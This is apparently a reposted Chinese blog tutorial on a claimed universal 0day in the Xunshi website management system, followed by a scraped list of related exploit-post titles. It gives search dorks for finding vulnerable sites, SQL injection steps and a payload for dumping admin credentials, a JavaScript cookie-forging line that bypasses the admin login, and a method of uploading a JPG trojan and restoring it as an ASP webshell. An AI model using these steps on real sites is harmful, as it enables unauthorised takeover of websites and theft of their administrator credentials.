讯时网站管理系统通杀0DAY漏洞
首先声明这方法不是我原创,我是从网上学习来的,由自己的语言重新编译一下的。
在谷歌搜索 inurl: admin/admin_news_pl_view.asp 打开搜索到的网址或者输入 inurl:news_more.asp?lm2=
然后修改成 admin/admin_news_pl_view.asp?id=1 或者 admin/admin_news_pl_view.asp?id=2 或者 admin/admin_news_pl_view.asp?id=3
只要显示错误就一直打3,4,5......
找到管理员和32位MDB密码后破解MDB密码,然后进后台 admin/admin_index.asp 输入破解好的用户名和密码直接进系统
另外还可以这样子进后台:
|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' // 得到管理员用户和MD5密码
cookies进后台
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
在系统里面有上传图片的功能,上传后,再用备份恢复数据库的功能来恢复上传好的JPG木马成 ASP格式,搞定。
转载于:https://www.cnblogs.com/swane/articles/3540137.html
讯时网站管理系统通杀0DAY漏洞相关推荐
- iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day
IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样.使用iis7.0的注意了.临时解决办法:关闭cgi.fix_pathinfo为0 Nginx好像又爆0day了,windows下可 ...
- V5shop 8.2版本下通杀注入漏洞
漏洞危害:高危 一.漏洞文件:cart.aspx 搜索关键词:inurl:scoreindex.aspx exp : /cart.aspx?act=buy&id=1 and (Select T ...
- mysql5.5.57 漏洞_DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
入侵步骤如下:http://www.oday.pw/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=i ...
- 某彩虹资源共享通杀漏洞
任意文件读取是属于文件操作漏洞的一种. 一般任意文件读取漏洞可以读取配置的信息甚至系统文件更重要. 是的你没看错,通杀0day 在某天上课的时候闲着,音乐老师放着好运来,好机会啊,赶紧挖个洞看看,接着 ...
- recommend.php sql注入漏洞,Espcms通杀SQL注入漏洞分析(附EXP)
漏洞:Espcms 通杀 SQL注入漏洞分析附EXP 漏洞作者:Seay博客:www.cnseay.com 官网介绍: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操 ...
- Espcms通杀SQL注入漏洞分析(附EXP)
漏洞:Espcms 通杀 SQL注入漏洞分析附EXP 漏洞作者:Seay 博客:www.cnseay.com 官网介绍: 易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有 ...
- e7xue.php漏洞_简要分析最近的dedecms通杀漏洞以及漏洞补丁的绕过
话说文章写得菜不要紧,首先标题要跟大牛一样! 作者:单恋一支花 出自:t00ls 转载请注明出处,如有雷同,纯属别人抄袭,嘿嘿! 一:写在前面 今天晚上想老婆了,失眠了,蛋裂之余,进吐司寻找基友,惊现 ...
- 漏洞进阶之——XSS万能超级无敌全通杀payload
XSS万能超级无敌全通杀payload XSS 漏洞简介 payload--on,js事件 payload--标签 payload--过狗过墙思路 本人常用payload分享 ------------ ...
- 易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警 -电脑资料...
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序, 找到get_client_ip()函数 ...
最新文章
- 【案例】弱电机房用电负荷计算意义及计算方法
- java序列化如何实现_Java实现序列化与反序列化的简单示例
- 《openssl 编程》之错误处理
- BZOJ 4516: [Sdoi2016]生成魔咒 [后缀自动机]
- linux 4412跑程序,荣品4412的板子上跑纯linux
- 15 岁黑进系统,发挑衅邮件意外获 Offer,不惑之年捐出全部财产,Twitter CEO 太牛了!...
- gmp新附录 计算机系统,GMP新附录:计算机系统.doc
- EcShop二次开发学习方法和Ecshop二次开发必备基础
- Linux iptable文档
- TimeLine学习笔记
- IDEA项目can not reconnect错误
- RSA中 底数m和模数 n 不互素是仍然成立
- 如何添加Google统计在自己的网站
- boss直聘改回系统头像_Boss直聘VS猎聘,谁的营销广告更胜一筹
- 送你一个励志故事——涵盖20多所互联网公司的校招C++面经
- HDU 6595 Everything Is Generated In Equal Probability (期望dp,线性推导)
- 《Asp.Net MVC 》复习题目
- 事件参数$event
- 使用java自造TCP/IP协议栈:使用JPCAP实现数据发包
- Linux网络安全策略
热门文章
- PHPExcel 锁定表头 设置样式,背景颜色,居中,宽,单元格合并
- java.io.IOException: Attempted read from closed stream.
- 千万级大V独家合作,西瓜视频用什么吸引创作人?
- python定义一个dog类 类属性有名字毛色体重_全面了解python中的类,对象,方法,属性...
- 《数学之美》读后感与商榷
- 教你如何做个妖精(女人必读)
- FLASH,宣传画册,翻书效果
- 善于计划,善于总结,善于归纳
- 【JAVA】图形用户界面练习
- 【lc3】汇编实现I/O中断